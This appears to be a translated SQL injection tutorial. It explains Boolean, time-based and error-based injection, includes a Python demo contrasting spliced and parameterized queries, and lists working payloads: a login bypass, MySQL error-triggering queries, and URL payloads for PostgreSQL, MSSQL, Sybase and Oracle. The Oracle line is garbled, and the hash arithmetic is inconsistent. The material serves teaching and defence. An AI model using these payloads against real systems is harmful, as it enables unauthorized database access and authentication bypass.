Classifying helps to digest the material. Roughly, SQL injection is divided into three kinds:
1. Boolean-based
2. Time-based
3. Error-based
1. Starting from the simplest: Boolean-based injection is the most common SQL injection method.
select username, password from tb_admin where username=User and password=Pass;
If the submitted data is spliced straight into this validation query, the result is a Boolean injection hole, specifically as follows:
"select username, password from tb_admin where username='" + User + "' and password='" + Pass + "';"
It looks as if a username and password of the expected form will produce a correct query, one that accurately reflects the values stored in the database, but if I pass in the following parameters:
Username input: 1' or '1'='1
Password: 1' or '1'='1
then, embedded in the original statement, it becomes: select username, password from tb_admin where username='1' or '1'='1' and password='1' or '1'='1';
In this case the OR condition is always true, so the SELECT always returns rows and the login check is passed. In practice this kind of Boolean-based SQL injection is becoming rarer, because only beginners write code like this, but the principle still needs to be known.
Injection reason: the user input parameters are not validated and are spliced directly into the SQL query, so carefully crafted user-submitted data is executed as code, which in turn bypasses authentication.
Workaround: do not trust any input from the user; all user input must be escaped before it is used.
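To make the hole concrete, here is an added example (not code from the original post) that runs the page's tb_admin login query both ways against a constructed in-memory SQLite table: the spliced version from above, and a hardened version that uses parameterized placeholders instead of string escaping. The table contents and the function names are assumptions made for the demonstration.

```python
import sqlite3

# Constructed sample data: one admin row in a table named as on the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tb_admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO tb_admin VALUES ('admin', 's3cret')")
    return conn

def login_spliced(conn, user, pwd):
    """Vulnerable: the input is concatenated into the SQL text, as on the page."""
    sql = ("SELECT username, password FROM tb_admin WHERE username='"
           + user + "' AND password='" + pwd + "'")
    return conn.execute(sql).fetchall()

def login_parameterized(conn, user, pwd):
    """Hardened: placeholders keep the values as data, never as SQL code."""
    sql = "SELECT username, password FROM tb_admin WHERE username=? AND password=?"
    return conn.execute(sql, (user, pwd)).fetchall()

# The Boolean payload quoted on the page, used for both fields.
PAYLOAD = "1' or '1'='1"

def demo():
    """Row counts returned by each variant for real credentials and for the payload."""
    conn = make_db()
    return {
        "spliced_valid": len(login_spliced(conn, "admin", "s3cret")),
        "spliced_payload": len(login_spliced(conn, PAYLOAD, PAYLOAD)),
        "param_valid": len(login_parameterized(conn, "admin", "s3cret")),
        "param_payload": len(login_parameterized(conn, PAYLOAD, PAYLOAD)),
    }

if __name__ == "__main__":
    print(demo())
```

The spliced query returns the admin row for the payload because the trailing '1'='1' is always true, while the parameterized query compares the literal string and returns nothing.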
2. Time-based injection:
This method is a little crude: as the name says, it judges the result of execution by the response time, but if the network is unreliable the result is hard to judge.
As far as MySQL is concerned, the two functions involved are sleep() and benchmark(), but the latter consumes more CPU, so it is not recommended.
Syntax:
SLEEP(duration)
Sleeps (pauses) for the number of seconds given by the duration argument, then returns 0. If SLEEP() is interrupted, it returns 1. The duration may have a fractional part given in microseconds.
Reading the syntax of sleep() shows that its effect is to delay execution for a given time.
FIND_IN_SET(str, strlist)
Returns a value in the range of 1 to N if the string str is in the string list strlist consisting of N substrings. A string list is a string composed of substrings separated by "," characters. If the first argument is a constant string and the second is a column of type SET, the FIND_IN_SET() function is optimized to use bit arithmetic. Returns 0 if str is not in strlist or if strlist is the empty string. Returns NULL if either argument is NULL. This function does not work properly if the first argument contains a comma (",") character.
This function searches for str in strlist and returns the position at which it is found.
3. Error-based blind injection
This works by using the database errors and other error information displayed by the website to dig deeper. Looking up a 32-bit hash value character by character needs 16x32=512 queries (the hash characters are hexadecimal, 16 possibilities in total), but there are ways to reduce the number of queries: the frequency order of letters in English is known: e,t,a,o,i,n,s,h,r,d,l,c,u,m,w,f,g,y,p,b,v,k,j,x,q,z
It is much more efficient to try the characters in that order first and then do a binary search over the ranges before and after.
This is an error-based entry point that relies on duplicate entries:
union select count(*), concat(version(), floor(rand(0)*2)) x from information_schema.tables group by x;
/* SQL Error (1062): Duplicate entry '5.5.171' for key 'group_key' */
If the key tables are disabled, there are other errors that can be triggered:
select count(*) from (select 1 union select null union select !1) group by concat(version(), floor(rand(0)))
/* SQL error (1248): Every derived table must have its own alias */
If some of the key functions, such as rand(), are disabled, you can do the following:
select min(@a:=1) from information_schema.tables group by concat(password, @a:=(@a+1)%2)
/* SQL Error (1054): Unknown column 'password' in 'group statement' */
These are MySQL database design problems, so the statements above do not apply to other databases.
MySQL 5.1 and later versions added two new XML functions that can also be used to trigger errors:
extractvalue(), updatexml()
In other databases, different methods can be used to produce an error.
PostgreSQL: /?param=1 and (1)=cast(version() as numeric)--
MSSQL: /?param=1 and (1)=convert(int,@@version)--
Sybase: /?param=1 and (1)=convert(int,@@version)--
Oracle >=9.0: /?param=1 and (1)=(select upper(XMLType(chr(60)||chr(58)||chr(58)||(select replace(banner,chr(+),chr) from sys.v_$version where rownum=1)||chr)) from dual)--
SQL Injection Summary